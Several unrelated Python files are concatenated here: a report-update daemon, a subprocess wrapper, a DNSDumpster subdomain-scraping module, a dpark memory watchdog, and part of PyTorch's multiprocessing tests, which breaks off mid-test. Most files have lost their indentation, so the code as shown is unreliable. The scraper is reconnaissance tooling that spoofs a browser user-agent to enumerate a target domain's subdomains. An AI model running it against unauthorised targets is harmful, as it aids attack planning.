def db_update(self, dbconn):
        ''' Writes the result of the file update to the db, sends a
        notification e-mail if the update failed, and clears the stored
        info about the file.
        '''
if self.fileinfo['update_error'] == 0:
dbconn.successful_update(self.fileinfo['reportID'],
self.fileinfo['update_time'])
else:
# 6 - problem with Outlook. Send mail using SQL Server.
if self.fileinfo['update_error'] == 6:
dbconn.send_emergency_mail(self.fileinfo['reportName'])
else:
send_mail(subject='(Ошибка обновления) ' + self.fileinfo['reportName'],
HTMLBody=('ID ошибки: ' + str(self.fileinfo['update_error']) +
'. ' + self.errors[self.fileinfo['update_error']] + '<br>' +
'Отчёт: ID ' + str(self.fileinfo['reportID']) + ' <a href="' +
path.join(self.fileinfo['fpath'], self.fileinfo['fname']) + '">' +
self.fileinfo['reportName'] + '</a>.'), rName=self.fileinfo['reportName'])
dbconn.failed_update(self.fileinfo['reportID'],
self.fileinfo['update_time'],
self.fileinfo['update_error'])
# clear info about last file
for key in self.fileinfo.keys():
self.fileinfo[key] = None
def email_gen(self, dbconn=None):
        ''' Returns a dictionary with keyword arguments for send_mail.
        A non-None "dbconn" parameter signals that this is a group mail.
        '''
# choose Group- or reportName and create path(-es) to attachment(-s)
if dbconn:
subj = self.fileinfo['GroupName']
att = []
for group_att in dbconn.group_attachments(self.fileinfo['GroupName']):
att.append(path.join(group_att[0], group_att[1]))
else:
subj = self.fileinfo['reportName']
att = [path.join(self.fileinfo['fpath'], self.fileinfo['fname'])] \
if self.fileinfo['Attachments'] else None
return {'to': self.fileinfo['NotificationsWhom'],
'copy': self.fileinfo['NotificationsCopy'],
'subject': '(Автоотчет) ' + subj + \
' (' + self.fileinfo['update_time'][:10] + ')', # date in brackets
'HTMLBody': self.fileinfo['Notificationstext'],
'att': att,
'rName': self.fileinfo['reportName']
}
def parse_SQL(self, file_sql):
''' Turns result from SQL query into a dictionary.
'''
for i in range(11):
self.fileinfo[self.parse_keys[i]] = file_sql[i]
def time_to_sleep(self):
''' Sleep before next cycle.
'''
now = time.localtime()
if now.tm_hour >= 20 or now.tm_hour < 6:
print('{}. No files to update.'
.format(time.strftime("%d-%m-%Y %H:%M:%S", now)))
time.sleep(3600)
return
print('{}. No files to update. Waiting {} seconds.'
.format(time.strftime("%d-%m-%Y %H:%M:%S", now), self.sleep_duration))
time.sleep(self.sleep_duration)
if self.sleep_duration < 450:
self.sleep_duration *= 2
##### Working cycles. #####
def run(self):
        ''' Init cycle. Connects to the database and, if an error occurred
        after the last file update, writes the pending info about that file
        to the db before starting the main cycle.
        '''
with DBConnect() as dbconn:
# download error description from db
for err in dbconn.error_description():
self.errors[err[0]] = err[1]
# if info wasn't written to db after last file update
if self.fileinfo['fname']:
self.db_update(dbconn)
# run main cycle
self.main_cycle(dbconn)
print('Exiting run...')
def main_cycle(self, dbconn):
        ''' Main cycle. Gets info about a file, calls the update_file function
        (which runs the "Update" macro in the Excel file) and saves the result
        to the db.
        '''
# check if thread was user interrupted
while thread.is_alive():
# get file
file_sql = dbconn.file_to_update()
# if no files to update
if file_sql is None:
self.time_to_sleep()
continue
self.parse_SQL(file_sql)
# Calling function to work with Excel
print('{}'.format(time.strftime("%d-%m-%Y %H:%M:%S", time.localtime())), end=' ')
self.fileinfo['update_error'] = update_file(self.fileinfo['fpath'],
self.fileinfo['fname'])
self.fileinfo['update_time'] = time.strftime("%d-%m-%Y %H:%M:%S",
time.localtime())
# Copy file
if self.fileinfo['update_error'] == 0 and self.fileinfo['SecondResourceLink']:
self.fileinfo['update_error'] = copy_file(self.fileinfo['fpath'],
self.fileinfo['fname'],
self.fileinfo['SecondResourceLink'])
# Send mail
if self.fileinfo['update_error'] == 0 and self.fileinfo['Notifications'] == 1:
# if we have no group - send mail
if not self.fileinfo['GroupName']:
self.fileinfo['update_error'] = send_mail(**self.email_gen())
# if we have GroupName - send mail if group_mail_check == 1
elif dbconn.group_mail_check(self.fileinfo['GroupName']):
self.fileinfo['update_error'] = send_mail(**self.email_gen(dbconn))
            # Write the result of the update to the db and send mail in case of a failure
self.db_update(dbconn)
time.sleep(3)
self.sleep_duration = 30
print('Exiting main cycle...')
def control_thread():
    ''' Function that monitors user input.
    If 1 is entered, the function exits, which interrupts the main cycle
    (the program only keeps running while this thread is alive).'''
while True:
output = input("Press 1 if you want to interrupt programm.\n")
if output == '1':
print('Programm is interrupted.')
break
print('Exiting daemon...')
if __name__ == "__main__":
# Start thread that monitors user input
thread = threading.Thread(target=control_thread)
# Python program exits when only daemon threads are left
thread.daemon = True
thread.start()
connection_retry = [0, time.time()]
# Initialize with no info about file
FileInfo = {'fname': None,
'fpath': None,
'reportID': None,
'reportName': None,
'update_error': None,
'update_time': None,
'Notifications': None,
'Attachments': None,
'NotificationsWhom': None,
'NotificationsCopy': None,
'Notificationstext': None,
'SecondResourceLink': None,
'GroupName': None}
main = Main(FileInfo)
sharepoint.sharepoint_check() # check connection to sharepoint
while connection_retry[0] < 10 and thread.is_alive():
try:
main.run()
except SQLError as e:
writelog(e)
# reset connection retries counter after 1 hour
if time.time() - connection_retry[1] > 3600:
connection_retry = [0, time.time()]
print(e)
connection_retry[0] += 1
            # increase the sleep interval in case of repeated connection failures
            t_sleep = 900 if connection_retry[0] == 9 else 20
            print('Retrying to connect in {} seconds. '
                  'Number of retries since the first recorded disconnect '
                  'in the last hour: {}'.format(t_sleep, connection_retry[0]))
time.sleep(t_sleep)
# in case of unexpected error - try to send email from SQL Server
except Exception as e:
writelog(e)
try:
with DBConnect() as dbconn:
dbconn.send_crash_mail()
finally:
sys.exit()
print('Exiting program.')
|
exec_cmd.py
|
# coding=utf-8
import logging
import os
import subprocess
import threading
logger = logging.getLogger(__name__)
def run(call_args, call_back, call_back_args):
(cwd, ignored) = os.path.split(call_args[0])
try:
logger.info("Running %r in %s." % (call_args, cwd))
subprocess.check_call(call_args, cwd=cwd)
    except subprocess.CalledProcessError as e:
        logger.warning("Could not execute cmd %s, got return code %r." % (call_args[0], e.returncode))
tmp_list = list(call_back_args)
tmp_list.append(e.returncode)
call_back_args = tuple(tmp_list)
if call_back and hasattr(call_back, '__call__'):
call_back(*call_back_args)
def execute_cmd(cmd_path, cmd_args, call_back=None, *call_back_args):
if cmd_args:
call_args = [cmd_path]
call_args.extend(cmd_args)
else:
call_args = [cmd_path]
thread = threading.Thread(target=run, args=(call_args, call_back, call_back_args))
thread.start()
return 0
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def test(*args):
        print(len(args))
        print(repr(args))
import time
execute_cmd("/bin/ls", ["-l", "/home"], test, "test")
time.sleep(2)
execute_cmd("/bin/ls", ["-l", "/error"], test, "test")
time.sleep(2)
execute_cmd("/bin/ls", ["-l", "/home/pi"], test)
time.sleep(2)
execute_cmd("/bin/ls", ["-l", "~"])
time.sleep(2)
|
dnsdumpster.py
|
import re
import threading
import requests
import hashlib
import urllib
class DNSDUMPSTER:
COOKIES = {'csrftoken' : ''}
DATA = {'csrfmiddlewaretoken' : '', 'targettip': ''}
SERVICE = "DNSDumpster"
LOCK = threading.Semaphore(value=1)
URL = "https://dnsdumpster.com"
REGEXP = "([a-z0-9]+[.])+%s"
TIMEOUT = 10
RESPONSE = ""
SUBDOMAINS = []
AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
HEADERS = {
'User-Agent' : '',
'Referer' : '',
}
def __init__(self, _class, _dm):
self.session = requests.Session()
self.baseclass = _class
self.domain = _dm
self.DATA['targettip'] = self.domain
self.regexp = self.REGEXP % (self.domain)
self.headers = self.headerer( self.HEADERS, self.AGENT )
def headerer(self, headers, _ag):
headers['User-Agent'] = _ag
headers['Referer'] = "https://dnsdumpster.com"
headers['Origin'] = "https://dnsdumpster.com"
return headers
def acquire_csrf(self, html):
obj = re.search(r"<input type='hidden' name='csrfmiddlewaretoken' value='(.*?)' />", html, re.IGNORECASE)
if obj:
return obj.groups()[0]
def execute(self):
_th = threading.Thread(target=self.request)
_th.daemon = True
_th.start()
def request(self):
self.baseclass.THREADS += 1
try:
req = self.session.get(self.URL, headers=self.headers, timeout=self.TIMEOUT)
if req.status_code < 400:
csrf = self.acquire_csrf(req.text)
self.COOKIES['csrftoken'] = csrf
self.DATA['csrfmiddlewaretoken'] = csrf
req = self.session.post(self.URL, data=self.DATA, cookies=self.COOKIES, headers=self.headers, timeout=self.TIMEOUT)
self.RESPONSE = req.text
self.extract()
self.append()
except Exception as e:
self.append()
self.baseclass.THREADS -= 1
def append(self, error=False):
self.LOCK.acquire()
self.baseclass.move( self.SERVICE, self.SUBDOMAINS )
self.LOCK.release()
def extract(self):
links = re.findall(r"<td class=\"col-md-4\">(.*?)<br>", self.RESPONSE)
for link in links:
if link.endswith(self.domain):
if link not in self.SUBDOMAINS:
self.SUBDOMAINS.append(link)
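# Illustrative usage sketch (not part of the original module).  The original
# "_class" collaborator is not shown here; from the calls above it only needs
# a THREADS counter and a move(service, subdomains) method, so the minimal
# stand-in below is an assumption for demonstration only.
if __name__ == "__main__":
    import time
    class _Collector(object):
        THREADS = 0
        def move(self, service, subdomains):
            print(service, subdomains)
    collector = _Collector()
    scraper = DNSDUMPSTER(collector, "example.com")
    scraper.execute()  # runs request() in a daemon thread
    time.sleep(15)     # crude wait; real callers poll collector.THREADS instead
    print(scraper.SUBDOMAINS)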
|
memory.py
|
import os
import sys
import time
import psutil
import resource
import threading
import platform
from dpark.utils.log import get_logger
logger = get_logger(__name__)
ERROR_TASK_OOM = 3
class MemoryChecker(object):
""" value in MBytes
only used in mesos task
start early
"""
def __init__(self):
self.rss = 0
self._stop = False
self.mf = None
self.check = True
self.addation = 0
self.mem = 100 << 30
self.ratio = 0.8
self.thread = None
self.task_id = None
self.oom = False
@property
def mem_limit_soft(self):
return int(self.mem * self.ratio)
def add(self, n):
self.addation += n
@property
def rss_rt(self):
return self.mf().rss + self.addation
@classmethod
def maxrss(cls):
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * 1024
def _kill(self, rss, from_main_thread):
template = "task used too much memory: %d MB > %d MB * 1.5," \
"kill it. use -M argument or taskMemory " \
"to request more memory."
msg = template % (rss >> 20, self.mem >> 20)
logger.warning(msg)
if from_main_thread:
os._exit(ERROR_TASK_OOM)
else:
            if sys.version_info[0] == 3:
import _thread
else:
import thread as _thread
self.oom = True
_thread.interrupt_main()
def after_rotate(self):
limit = self.mem_limit_soft
self.rss = rss = self.rss_rt
if rss > limit * 0.9:
if rss > self.mem * 1.5:
self._kill(rss, from_main_thread=True)
else:
new_limit = max(limit, rss) * 1.1
self.ratio = new_limit / self.mem * 1.1
logger.info('after rotate, rss = %d MB, enlarge soft memory limit %d -> %d MB, origin = %d MB',
rss >> 20,
limit >> 20,
self.mem_limit_soft >> 20,
self.mem >> 20)
def _start(self):
p = psutil.Process()
logger.debug("start mem check thread")
if hasattr(p, "memory_info"):
self.mf = getattr(p, "memory_info")
else:
self.mf = getattr(p, 'get_memory_info')
mf = self.mf
def check_mem():
while not self._stop:
rss = self.rss = (mf().rss + self.addation) # 1ms
if self.check and rss > self.mem * 1.5:
self._kill(rss, from_main_thread=False)
time.sleep(0.1)
self.thread = t = threading.Thread(target=check_mem)
t.daemon = True
t.start()
def start(self, task_id, mem_limit_mb):
self._stop = False
self.mem = int(mem_limit_mb) << 20
self.task_id = task_id
if not self.thread:
self._start()
self.thread.name = "task-%s-checkmem" % (task_id,)
def stop(self):
self._stop = True
self.thread.join()
self.thread = None
def set_oom_score(score=100):
if platform.system() == 'Linux':
pid = os.getpid()
entry = "oom_score_adj"
path = "/proc/{}/{}".format(pid, entry)
try:
with open(path, "w") as f:
f.write("{}".format(score))
except:
pass
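# Illustrative usage sketch (not part of the original module): the lifetime of
# a MemoryChecker inside a worker process.  The task id and the 512 MB limit
# below are made-up values for demonstration only.
if __name__ == '__main__':
    set_oom_score(200)  # ask the kernel to prefer OOM-killing this process
    checker = MemoryChecker()
    checker.start(task_id='demo-task', mem_limit_mb=512)
    try:
        data = [bytearray(1 << 20) for _ in range(64)]  # allocate roughly 64 MB
        print('rss is now %d MB' % (checker.rss_rt >> 20))
    finally:
        checker.stop()  # joins the background check thread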
|
test_multiprocessing.py
|
# Owner(s): ["module: multiprocessing"]
import contextlib
import gc
import os
import sys
import time
import unittest
import copy
from sys import platform
import torch
import torch.cuda
import torch.multiprocessing as mp
import torch.utils.hooks
from torch.nn import Parameter
from torch.testing._internal.common_utils import (TestCase, run_tests, IS_WINDOWS, NO_MULTIPROCESSING_SPAWN, TEST_WITH_ASAN,
load_tests, slowTest, TEST_WITH_TSAN)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
TEST_REPEATS = 30
HAS_SHM_FILES = os.path.isdir('/dev/shm')
TEST_CUDA_IPC = torch.cuda.is_available() and \
sys.platform != 'darwin' and \
sys.platform != 'win32'
TEST_MULTIGPU = TEST_CUDA_IPC and torch.cuda.device_count() > 1
class SubProcess(mp.Process):
def __init__(self, tensor):
super(SubProcess, self).__init__()
self.tensor = tensor
self.daemon = True
def run(self):
self.tensor.add_(3)
def _test_cuda_ipc_deadlock_actor(queue, iterations):
for i in range(iterations):
if not queue.empty():
queue.get()
time.sleep(.01)
def _test_cuda_ipc_deadlock_learner(queue, iterations):
net = torch.nn.LSTM(1, 1).cuda()
for i in range(iterations):
if not queue.full():
queue.put(copy.deepcopy(net.state_dict()))
time.sleep(.01)
def simple_fill(queue, event):
data = queue.get()
data[0][:] = 4
event.set()
def simple_pool_fill(tensor):
tensor.fill_(4)
return tensor.add(1)
def send_tensor(queue, event, device, dtype):
t = torch.ones(5, 5, device=device, dtype=dtype)
queue.put(t)
queue.put(t)
event.wait()
def send_and_delete_tensors(queue, event, device, dtype, count, size=5):
for i in range(count):
t = torch.full([size], i, device=device, dtype=dtype)
queue.put(t)
del t
event.wait()
def receive_and_send_sum(queue, out_queue, event, device, dtype, count, size=5):
s = torch.full([size], 0, device=device, dtype=dtype)
for i in range(count):
t = queue.get()
s += t
out_queue.put(s)
event.wait()
def receive_and_send(queue, out_queue, event, count):
for i in range(count):
t = queue.get()
out_queue.put(t.clone())
event.wait()
def sum_tensors(inq, outq):
with torch.cuda.device(1):
tensors = inq.get()
for tensor in tensors:
outq.put((tensor.sum().item(), tensor.get_device(),
tensor.numel(), tensor.storage().size()))
def queue_get_exception(inqueue, outqueue):
os.close(2) # hide expected error message
try:
torch.zeros(5, 5).cuda()
except Exception as e:
outqueue.put(e)
else:
outqueue.put('no exception')
# Multiply by two in a separate stream
def cuda_multiply_two(queue, ready, done):
ready.set()
with torch.cuda.stream(torch.cuda.Stream()):
cuda_event, tensor = queue.get()
cuda_event.wait()
tensor.mul_(2)
cuda_event.record()
done.set()
del cuda_event
def requires_grad_variable_sharing(queue, ready):
var = queue.get()
ready.set()
queue.put(var.requires_grad)
def integer_parameter_serialization(iparam):
iparam + 1
def autograd_sharing(queue, ready, master_modified, device, is_parameter):
var = queue.get()
ready.set()
master_modified.wait()
expected_var = torch.arange(1., 26, device=device).view(5, 5)
expected_var[0, 0] = 1000
is_ok = var.data.equal(expected_var)
var.data[:] = torch.ones(5, 5, device=device)
is_ok &= var.grad is None
is_ok &= not var._backward_hooks
if is_parameter:
is_ok &= type(var) == Parameter
else:
is_ok &= type(var) == torch.Tensor
var._grad = torch.ones(5, 5, device=device)
queue.put(is_ok)
def mixed_type_producer(queue, event):
for _ in range(10):
float_tensor = torch.ones(2, 2).float().cuda()
byte_tensor = torch.zeros(2, 2).byte().cuda()
queue.put(float_tensor)
queue.put(byte_tensor)
event.wait()
event.clear()
def simple_autograd_function(a=1):
torch.rand(3).requires_grad_(True).mean().backward()
return a ** 2
@contextlib.contextmanager
def fs_sharing():
prev_strategy = mp.get_sharing_strategy()
mp.set_sharing_strategy('file_system')
try:
yield
finally:
mp.set_sharing_strategy(prev_strategy)
class leak_checker(object):
def __init__(self, test_case):
self.checked_pids = [os.getpid()]
self.test_case = test_case
def __enter__(self):
self.next_fds = self._get_next_fds(10)
return self
def __exit__(self, *args):
if torch.cuda.is_available():
torch.cuda.ipc_collect()
if args[0] is None:
# Check that the 10th available file-descriptor at the end of the
# test is no more than 4 higher than the 10th available at the
# start. This attempts to catch file descriptor leaks, but allows
# one-off initialization that may use up a file descriptor
# TODO: Disabled because this check is too flaky
# available_fds = self._get_next_fds(10)
# self.test_case.assertLessEqual(
# available_fds[-1] - self.next_fds[-1], 5)
self.test_case.assertFalse(self.has_shm_files())
return False
def check_pid(self, pid):
self.checked_pids.append(pid)
def _get_next_fds(self, n=1):
# dup uses the lowest-numbered unused descriptor for the new descriptor
fds = [os.dup(0) for i in range(n)]
for fd in fds:
os.close(fd)
return fds
def has_shm_files(self, wait=True):
if not HAS_SHM_FILES:
return False
result = self._has_shm_files()
if result and mp.get_sharing_strategy() == 'file_system' and wait:
time.sleep(0.5)
return self._has_shm_files()
return result
def _has_shm_files(self):
gc.collect()
names = ['torch_' + str(pid) for pid in self.checked_pids]
for filename in os.listdir('/dev/shm'):
for name in names:
if filename.startswith(name):
return True
return False
@unittest.skipIf(TEST_WITH_TSAN, "TSAN is not fork-safe since we're forking in a multi-threaded environment")
class TestMultiprocessing(TestCase):
def tearDown(self):
        # This will keep tests isolated from each other
if torch.cuda.is_available():
torch.cuda.ipc_collect()
def _test_sharing(self, ctx=mp, device='cpu', dtype=torch.float, repeat=1):
def test_fill():
x = torch.zeros(5, 5).to(device, dtype)
q = ctx.Queue()
e = ctx.Event()
data = [x, x[:, 1]]
q.put(data)
p = ctx.Process(target=simple_fill, args=(q, e))
p.daemon = True
lc.check_pid(p.pid)
p.start()
e.wait(10)
self.assertTrue(e.is_set())
self.assertTrue(data[0].eq(4).all())
self.assertTrue(data[1].eq(4).all())
p.join(1)
self.assertFalse(p.is_alive())
def test_receive():
q = ctx.Queue()
e = ctx.Event()
p = ctx.Process(target=send_tensor, args=(q, e, device, dtype))
p.daemon = True
lc.check_pid(p.pid)
p.start()
t1 = q.get()
t2 = q.get()
self.assertTrue(t1.eq(1).all())
s1 = t1.storage()
s2 = t2.storage()
self.assertEqual(type(s1), type(s2))
            self.assertEqual(s1.data_ptr(), s2.data_ptr())
self.assertEqual(s1, s2)
            # We need to delete these tensors so that the producer (child
            # process) can collect them properly
del t1, t2
e.set()
p.join(1)
self.assertFalse(p.is_alive())
with leak_checker(self) as lc:
for _ in range(repeat):
test_fill()
test_receive()
def _test_preserve_sharing(self, ctx=mp, repeat=1):
def do_test():
x = torch.randn(5, 5)
data = [x.storage(), x, x[2], x[:, 1]]
q = ctx.Queue()
q.put(data)
new_data = q.get(timeout=1)
self.assertEqual(new_data, data, atol=0, rtol=0)
storage_cdata = data[0]._cdata
self.assertEqual(new_data[0]._cdata, storage_cdata)
for t in new_data[1:]:
self.assertEqual(t.storage()._cdata, storage_cdata)
with leak_checker(self):
for _ in range(repeat):
do_test()
def _test_pool(self, ctx=mp, repeat=1):
def do_test():
p = ctx.Pool(2)
for proc in p._pool:
lc.check_pid(proc.pid)
buffers = [torch.zeros(2, 2) for i in range(4)]
results = p.map(simple_pool_fill, buffers, 1)
self.assertEqual(len(results), len(buffers))
for r in results:
self.assertEqual(r, torch.ones(2, 2) * 5, atol=0, rtol=0)
for b in buffers:
self.assertEqual(b, torch.ones(2, 2) * 4, atol=0, rtol=0)
p.close()
p.join()
with leak_checker(self) as lc:
for _ in range(repeat):
do_test()
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
@unittest.skipIf(TEST_WITH_ASAN,
"seems to hang with ASAN, see https://github.com/pytorch/pytorch/issues/5326")
def test_fd_sharing(self):
self._test_sharing(repeat=TEST_REPEATS)
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
def test_fd_preserve_sharing(self):
self._test_preserve_sharing(repeat=TEST_REPEATS)
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
def test_fd_pool(self):
self._test_pool(repeat=TEST_REPEATS)
@unittest.skipIf(TEST_WITH_ASAN,
"seems to hang with ASAN, see https://github.com/pytorch/pytorch/issues/5326")
def test_fs_sharing(self):
with fs_sharing():
self._test_sharing(repeat=TEST_REPEATS)
def test_fs_preserve_sharing(self):
with fs_sharing():
self._test_preserve_sharing(repeat=TEST_REPEATS)
def test_fs_pool(self):
with fs_sharing():
self._test_pool(repeat=TEST_REPEATS)
@unittest.skipIf(not HAS_SHM_FILES, "don't not how to check if shm files exist")
def test_fs(self):
def queue_put():
x = torch.DoubleStorage(4)
q = mp.Queue()
self.assertFalse(lc.has_shm_files())
q.put(x)
time.sleep(0.05) # queue serializes asynchronously
self.assertTrue(lc.has_shm_files(wait=False))
q.get()
with fs_sharing(), leak_checker(self) as lc:
for _ in range(TEST_REPEATS):
queue_put()
def test_inherit_tensor(self):
t = torch.zeros(5, 5)
p = SubProcess(t.share_memory_())
p.start()
p.join(2)
if p.exitcode is None:
print("test_inherit_tensor: SubProcess too slow")
else:
self.assertEqual(t, torch.ones(5, 5) * 3, atol=0, rtol=0)
@unittest.skipIf(IS_WINDOWS, "Test needs to use fork multiprocessing")
def test_autograd_errors(self):
ctx = mp.get_context('fork')
simple_autograd_function()
# Autograd only uses thread when GPUs are involved
if torch.cuda.is_available():
with self.assertRaisesRegex(RuntimeError, r'Unable to handle autograd'):
with ctx.Pool(3) as pool:
pool.map(simple_autograd_function, [1, 2, 3])
else:
with ctx.Pool(3) as pool:
pool.map(simple_autograd_function, [1, 2, 3])
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Test needs to use spawn multiprocessing")
def test_autograd_fine_with_spawn(self):
ctx = mp.get_context('spawn')
simple_autograd_function()
with ctx.Pool(3) as pool:
pool.map(simple_autograd_function, [1, 2, 3])
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_simple(self):
torch.cuda.FloatTensor([1]) # initialize CUDA outside of leak checker
self._test_sharing(mp.get_context('spawn'), 'cuda', torch.float)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_memory_allocation(self):
ctx = mp.get_context('spawn')
q = ctx.Queue()
e = ctx.Event()
p = ctx.Process(target=send_and_delete_tensors, args=(q, e, 'cuda', torch.int, 5))
p.start()
t = []
for _ in range(5):
t.append(q.get())
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(t[0], torch.full([5], 0.))
del t
e.set()
p.join(1)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_ipc_deadlock(self):
ctx = mp.get_context('spawn')
queue = ctx.Queue(1)
processes = dict(
a=ctx.Process(target=_test_cuda_ipc_deadlock_actor, args=(queue, 100)),
l=ctx.Process(target=_test_cuda_ipc_deadlock_learner, args=(queue, 100)))
for p in processes.values():
p.start()
for p in processes.values():
p.join(10)
for p in processes.values():
self.assertFalse(p.is_alive())
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_send_many(self, name=None, size=5, count=100000):
ctx = mp.get_context('spawn')
q1 = ctx.Queue()
q2 = ctx.Queue()
q3 = ctx.Queue()
e1 = ctx.Event()
e2 = ctx.Event()
e3 = ctx.Event()
p1 = ctx.Process(target=send_and_delete_tensors, args=(q1, e1, 'cuda', torch.long, count, size))
p2 = ctx.Process(target=receive_and_send, args=(q1, q2, e2, count))
p3 = ctx.Process(target=receive_and_send_sum, args=(q2, q3, e3, 'cuda', torch.long, count, size))
p1.start()
p2.start()
p3.start()
result = q3.get()
self.assertEqual(result[0], int(count * (count - 1) / 2))
del result
e1.set()
e2.set()
e3.set()
p1.join(1)
p2.join(1)
p3.join(1)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
@unittest.skipIf(not TEST_MULTIGPU, 'found only 1 GPU')
def test_cuda_small_tensors(self):
# Check multiple small tensors which will likely use the same
# underlying cached allocation
ctx = mp.get_context('spawn')
tensors = []
for i in range(5):
device = i % 2
tensors += [torch.arange(i * 5., (i + 1) * 5).cuda(device)]
inq = ctx.Queue()
outq = ctx.Queue()
inq.put(tensors)
p = ctx.Process(target=sum_tensors, args=(inq, outq))
p.start()
results = []
for _ in range(5):
results.append(outq.get())
p.join()
for i, _tensor in enumerate(tensors):
v, device, tensor_size, storage_size = results[i]
self.assertEqual(v, torch.arange(i * 5., (i + 1) * 5).sum())
self.assertEqual(device, i % 2)
self.assertEqual(tensor_size, 5)
# You might think this should be the case, but it's not! After
# data from the CUDA caching allocator goes through IPC, the
# size of the storage is the size of the *cached cudaMalloc for
# the entire memory block* of the storage, not just the storage.
# See Note [CUDA IPC and the caching allocator] for more info
#
# self.assertEqual(storage_size, 5)
# Collect current process (producer) files, make sure nothing holds
# ref to the sent tensors
del _tensor
del tensors
# We need to collect, as CUDA MP implementation holds one shared
        # memory 'file' for performance reasons
torch.cuda.ipc_collect()
@unittest.skipIf(IS_WINDOWS, 'not applicable to Windows (only fails with fork)')
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_cuda_bad_call(self):
# Initialize CUDA
t = torch.zeros(5, 5).cuda().cpu()
inq = mp.Queue()
outq = mp.Queue()
p = mp.Process(target=queue_get_exception, args=(inq, outq))
p.start()
inq.put(t)
p.join()
self.assertIsInstance(outq.get(), RuntimeError)
@unittest.skipIf(IS_WINDOWS, 'not applicable to Windows (only fails with fork)')
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_wrong_cuda_fork(self):
stderr = TestCase.runWithPytorchAPIUsageStderr("""\
import torch
from torch.multiprocessing import Process
def run(rank):
torch.cuda.set_device(rank)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
# it would work fine without the line below
x = torch.rand(20, 2).cuda()
p = Process(target=run, args=(rank,))
p.start()
processes.append(p)
for p in processes:
p.join()
""")
self.assertRegex(stderr, "Cannot re-initialize CUDA in forked subprocess.")
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event(self):
ctx = mp.get_context('spawn')
queue = ctx.Queue()
ready = ctx.Event()
done = ctx.Event()
p = ctx.Process(target=cuda_multiply_two, args=(queue, ready, done))
p.start()
ready.wait()
with torch.cuda.stream(torch.cuda.Stream()):
tensor = torch.cuda.FloatTensor([1, 1, 1, 1])
# Use a sleep kernel to test events. Without the event, the
# multiply happens before the add.
event = torch.cuda.Event(interprocess=True)
torch.cuda._sleep(20000000) # about 30 ms
tensor.add_(1)
event.record()
queue.put((event, tensor))
done.wait() # must wait until subprocess records event
event.synchronize()
self.assertEqual(list(tensor), [4, 4, 4, 4])
p.join()
@staticmethod
def _test_event_multiprocess_child(event, p2c, c2p):
c2p.put(0) # notify parent child is ready
p2c.get() # wait for record in parent
event.synchronize()
c2p.put(1) # notify parent synchronization is done
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event_multiprocess(self):
event = torch.cuda.Event(enable_timing=False, interprocess=True)
self.assertTrue(event.query())
ctx = mp.get_context('spawn')
p2c = ctx.SimpleQueue()
c2p = ctx.SimpleQueue()
p = ctx.Process(
target=TestMultiprocessing._test_event_multiprocess_child,
args=(event, p2c, c2p))
p.start()
        c2p.get()  # wait until the child process is ready
torch.cuda._sleep(50000000) # spin for about 50 ms
event.record()
p2c.put(0) # notify child event is recorded
self.assertFalse(event.query())
c2p.get() # wait for synchronization in child
self.assertTrue(event.query())
p.join()
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
@unittest.skipIf(not TEST_MULTIGPU, 'found only 1 GPU')
def test_event_handle_multi_gpu(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
e0 = torch.cuda.Event(enable_timing=False, interprocess=True)
with torch.cuda.device(d1):
# create handle on different device from un-recorded event
e0.ipc_handle()
with torch.cuda.device(d0):
e1 = torch.cuda.Event(enable_timing=False, interprocess=True)
stream = torch.cuda.Stream()
torch.cuda._sleep(50000000) # spin for about 50 ms
e1.record(stream)
with torch.cuda.device(d1):
# create handle on different device from recorded event
e1.ipc_handle()
@staticmethod
def _test_event_handle_importer_consumer(handle, p2c, c2p):
e1 = torch.cuda.Event.from_ipc_handle(0, handle)
c2p.put(0) # notify parent child is ready
p2c.get() # wait for record in parent
e1.synchronize()
        c2p.put(1)  # notify parent that synchronization is done in child
p2c.get() # wait for parent to finish before destructing child event
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event_handle_importer(self):
e0 = torch.cuda.Event(enable_timing=False, interprocess=True)
self.assertTrue(e0.query())
ctx = mp.get_context('spawn')
